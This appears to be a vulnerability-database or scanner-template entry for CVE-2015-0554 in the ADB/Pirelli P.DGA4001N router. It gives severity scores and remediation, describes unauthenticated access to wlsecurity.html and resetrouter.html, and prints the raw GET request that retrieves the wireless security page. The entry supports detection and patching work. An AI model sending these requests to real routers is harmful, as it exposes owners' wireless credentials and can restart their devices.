| Title | ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure |
|---|---|
| Author | daffainfo |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to gain sensitive information from the router. |
| Remediation | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. |
| CVSS Score | 9.4 |
| EPSS Score | 0.38604 |
| CVE ID | CVE-2015-0554 |
| CWE ID | CWE-264 |
| Tags | cve2015 cve pirelli router disclosure edb packetstorm adb vuln |
ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
GET /wlsecurity.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-0554.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-0554.pcap
N/AN/A